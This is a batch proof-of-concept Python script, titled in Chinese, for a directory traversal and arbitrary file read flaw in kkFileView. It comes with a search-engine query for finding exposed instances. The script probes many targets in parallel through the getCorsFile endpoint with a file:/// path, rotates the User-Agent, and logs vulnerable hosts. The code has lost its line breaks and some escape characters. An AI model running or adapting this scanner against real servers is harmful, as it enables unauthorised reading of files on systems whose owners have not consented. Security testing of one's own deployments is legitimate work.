(批量POC)kkFileview目录遍历+任意文件读取

body="kkFileview"

import requestsimport sysimport urllib3from argparse import ArgumentParserimport threadpoolfrom urllib import parsefrom time import timeimport reimport random
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)filename = sys.argv[1]url_list=[]
def get_ua():  first_num = random.randint(55, 62)  third_num = random.randint(0, 3200)  fourth_num = random.randint(0, 140)  os_type = [    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',    '(Macintosh; Intel Mac OS X 10_12_6)'  ]  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',           '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']          )  return ua
def wirte_targets(vurl, filename):  with open(filename, "a+") as f:    f.write(vurl + "n")
def check_url(url):  vulnurl=url + "/getCorsFile?urlPath=file:///c://windows/system32/drivers/etc"  headers = {    'User-Agent': get_ua(),  }  try:    res = requests.get(vulnurl, verify=False, allow_redirects=False, headers=headers,timeout=5)    if 'hosts' in res.text:      print("33[32m[+]{} is vulnerable33[0m".format(url))      wirte_targets(vulnurl,"vuln.txt")    else:      print("33[34m[-]{} not vulnerable.33[0m".format(url))  except Exception as e:    print("33[34m[!]{} request false.33[0m".format(url))    pass

def multithreading(url_list, pools=5):  works = []  for i in url_list:    # works.append((func_params, None))    works.append(i)  # print(works)  pool = threadpool.ThreadPool(pools)  reqs = threadpool.makeRequests(check_url, works)  [pool.putRequest(req) for req in reqs]  pool.wait()

if __name__ == '__main__':  arg=ArgumentParser(description='check_url By m2')  arg.add_argument("-u",            "--url",            help="Target URL; Example:http://ip:port")  arg.add_argument("-f",            "--file",            help="Target URL; Example:url.txt")  args=arg.parse_args()  url=args.url  filename=args.file  print("[+]任务开始.....")  start=time()  if url != None and filename == None:    check_url(url)  elif url == None and filename != None:    for i in open(filename):      i=i.replace('n','')      url_list.append(i)    multithreading(url_list,10)  end=time()  print('任务完成,用时%ds.' %(end-start))